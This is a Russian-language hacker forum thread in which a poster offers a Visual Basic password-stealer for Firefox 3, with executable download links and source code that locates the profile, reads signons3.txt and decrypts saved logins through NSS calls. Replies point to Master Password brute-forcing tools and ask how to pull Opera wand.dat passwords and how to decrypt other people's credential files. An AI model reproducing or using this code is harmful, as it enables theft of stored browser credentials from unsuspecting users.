p4ss f1nd3r for ff3! Вобщем накодил на vb небольшую софтинку,прога "вспоминает" пароли от мозиллы,высвечивает урл,логин,пасс,дату,дизайн ака "Tроя жива" критика уместна,если норм,то доработаю,переделаю,дополню,жду отзывов вот собственно линк на нее: http://rapidshare.com/files/174956221/ff_p4s_fuck3rz.exe.html http://dump.ru/file/1338529 http://www.x2b.ru/get/17928 Чуть не забыл,tnx 2 Exlibris & xcedz & Jes(джесу за то что он такой душка) за помощь в придумывании мегохакерского названия для программы!) #забыл сказать, перед запуском сохраните ваши пароли (на всякий случай),ато некоторые уже тестировали xDD
Code: sFFPath = GetSpecialfolder(CSIDL_APPDATA) & "\Mozilla\Firefox\" & "profiles.ini" sRet = Space(260) Call GetPrivateProfileString("Profile0", "Path", vbNullString, sRet, 260, sFFPath) sRet = Left$(sRet, lstrlen(sRet)) sFFPath = GetSpecialfolder(CSIDL_APPDATA) & "\Mozilla\Firefox\" & sRet & "\signons3.txt" Open sFFPath For Binary Access Read As #1 sPass = Space(LOF(1)) Get #1, , sPass Close #1 sRet = GetSpecialfolder(CSIDL_APPDATA) & "\Mozilla\Firefox\" & sRet svEntry = Split(sPass, "." & vbCrLf) bvRet = StrConv(sRet, vbFromUnicode) If CallFunc("NSS_Init", StrPtr(bvRet)) = 0 Then lKeySlot = CallFunc("PK11_GetInternalKeySlot") If Not lKeySlot = 0 Then If CallFunc("PK11_Authenticate", lKeySlot, True, 0) = 0 Then For i = 1 To UBound(svEntry) - 1 svLines = Split(svEntry(i), vbCrLf) Enumerate = Enumerate & " " & "URL: " & svLines(0) & vbCrLf For j = 1 To UBound(svLines) - 3 Step 2 If Not svLines(j + 1) = "---" Then Enumerate = Enumerate & " " & "Section: " & svLines(j) & vbCrLf Enumerate = Enumerate & " " & "Value: " & svLines(j + 1) & vbCrLf bvRet = StrConv(svLines(j + 1), vbFromUnicode) Call CallFunc("NSSBase64_DecodeBuffer", 0, VarPtr(tSec), StrPtr(bvRet), Len(svLines(j + 1))) If CallFunc("PK11SDR_Decrypt", VarPtr(tSec), VarPtr(tSecDec), 0) = 0 Then If tSecDec.SECItemLen > 0 Then ReDim bvRet(tSecDec.SECItemLen - 1) CopyMemory bvRet(0), ByVal tSecDec.SECItemData, tSecDec.SECItemLen Enumerate = Enumerate & " " & "Data: " & StrConv(bvRet, vbUnicode) & vbCrLf End If End If End If
а давайте ценить свое и других время? вопрос написали русским языком "А где мозила хранит пароли?", ты кинул сурс, но ведь можно было ответить нормально? я не шарю в vb, но очевидно, что в profiles.ini ты берешь название папки с профилем и в той папке открываешь файл signons3.txt (криво открываешь - у меня создался пустой файл, т.к. фф2 и есть только signons2.txt). почему signons3.txt, а не signons2.txt ? мозилла 3 ? так вот, погуглил бы вначале, а потом бы и изобретал велосипед. хешированные записи паролей хранятся в файлах signons*.txt, скорей всего для 3 мозиллы цифра 3, для 2 - 2, для 1 - просто signons.txt. дальше пару цитат из перевода статьи Mikhael Felker`а "Механизмы управления паролями в IE и Firefox": у меня установлен Master Password и твоя тузла конечно же не сработала (подогнал свой signons2.txt под работоспособность твоего велосипеда). Master Password надо брутить, брутится очень быстро. инструмент написан давно и доступен с исходниками - Firemaster. ссылки по теме: http://securityxploded.com/firemaster.php http://securityxploded.com/firepassword.php http://www.mozilla-russia.org/products/firefox/faq/ Механизмы управления паролями в IE и Firefox. Часть первая. Механизмы управления паролями в IE и Firefox. Часть вторая. http://www.mozilla.org/projects/security/pki/nss/
1. в чем моя неадекватность? 2. я номрально спросил в репе и спросил человек в теме, а ты понтанулся сурсом. 3. никто меня не заставлял, что нельзя проверить работоспособность? 4. я тебя виноватым не делаю, я высказал свое мнение о твоей тулзе. 5. ну тогда уже допиши - онли фф3. 6. успокойся.
сорь за офтоп. Ну а как из оперовского wand.dat пароли тянуть?нужен только этот файл или ещё какие то?
прога нормальная но работает только на своем копе а есть типа такой же тоьлко которой не свой signons2.txt а чужой расшифровывается?
